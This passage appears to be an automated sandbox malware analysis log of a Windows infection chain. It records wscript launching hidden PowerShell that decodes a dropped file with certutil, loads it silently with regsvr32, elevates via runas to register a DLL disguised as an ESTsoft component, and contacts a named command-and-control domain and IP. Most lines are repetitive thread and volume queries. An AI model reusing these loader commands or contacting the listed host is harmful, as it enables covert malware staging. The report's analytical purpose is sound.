        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4064Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6160Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2752Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3776Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5172Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5460Thread sleep count: 1018 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6284Thread sleep time: -7378697629483816s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5956Thread sleep count: 33 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7100Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\regsvr32.exe TID: 4236Thread sleep count: 59 > 30
        Source: C:\Windows\System32\regsvr32.exe TID: 4236Thread sleep time: -590000s >= -30000s
        Source: C:\Windows\System32\regsvr32.exe TID: 2148Thread sleep count: 587 > 30
        Source: C:\Windows\System32\regsvr32.exe TID: 1380Thread sleep count: 35 > 30
        Source: C:\Windows\System32\regsvr32.exe TID: 1380Thread sleep time: -2100000s >= -30000s
        Source: C:\Windows\System32\regsvr32.exe TID: 2812Thread sleep count: 39 > 30
        Source: C:\Windows\System32\regsvr32.exe TID: 2812Thread sleep time: -2340000s >= -30000s
        Source: C:\Windows\System32\regsvr32.exe TID: 2372Thread sleep time: -2100000s >= -30000s
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1339Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 752Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 361Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1543
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1018
        Source: C:\Windows\System32\regsvr32.exeWindow / User API: threadDelayed 587
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
        Source: C:\Windows\System32\regsvr32.exeAPI coverage: 4.7 %
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DE3188 FindFirstFileW,13_2_00007FF983DE3188
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DB66E0 FindFirstFileW,FindNextFileW,WideCharToMultiByte,GetLastError,FindClose,FindClose,13_2_00007FF983DB66E0
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DD84FC FindFirstFileExW,13_2_00007FF983DD84FC
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DB6BB0 FindFirstFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,13_2_00007FF983DB6BB0
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D53188 FindFirstFileW,19_2_00007FF983D53188
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D266E0 FindFirstFileW,FindNextFileW,WideCharToMultiByte,GetLastError,FindClose,FindClose,19_2_00007FF983D266E0
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D484FC FindFirstFileExW,19_2_00007FF983D484FC
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D26BB0 FindFirstFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,19_2_00007FF983D26BB0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
        Source: wscript.exe, 00000000.00000002.569859392.0000027E9B780000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: regsvr32.exe, 00000021.00000003.966532472.0000000003AD5000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
        Source: wscript.exe, 00000000.00000002.569859392.0000027E9B780000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: wscript.exe, 00000000.00000002.569859392.0000027E9B780000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: wscript.exe, 00000000.00000002.569859392.0000027E9B780000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DE3280 IsDebuggerPresent,13_2_00007FF983DE3280
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DABCCF LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,ExitProcess,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_nor13_2_00007FF983DABCCF
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DD9B80 GetProcessHeap,13_2_00007FF983DD9B80
        Source: C:\Windows\System32\regsvr32.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DB9314 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,TerminateProcess,13_2_00007FF983DB9314
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DE3248 SetUnhandledExceptionFilter,13_2_00007FF983DE3248
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DB9F90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00007FF983DB9F90
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DBDEB8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00007FF983DBDEB8
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D29314 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,TerminateProcess,19_2_00007FF983D29314
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D53248 SetUnhandledExceptionFilter,19_2_00007FF983D53248
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D29F90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00007FF983D29F90
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D2DEB8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00007FF983D2DEB8

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        System process connects to network (likely due to code injection or exploit)Show sources
        Source: C:\Windows\System32\regsvr32.exeDomain query: texts.letterpaper.press
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 50.17.5.224 80
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' 'C:\ProgramData\ 2021-05-07.pdf'Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9aJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden regsvr32.exe /s C:\Windows\..\ProgramData\glK7UwV.pR9aJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\certutil.exe 'C:\Windows\system32\certutil.exe' -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9aJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\system32\regsvr32.exe' /s C:\Windows\..\ProgramData\glK7UwV.pR9aJump to behavior
        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll'Jump to behavior
        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runasJump to behavior
        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ProgramData\temp\3AED.tmp VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ProgramData\temp\4C70.tmp-PowerShell_transcript.910646.BLm8LGmw.20210825105913.txt VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
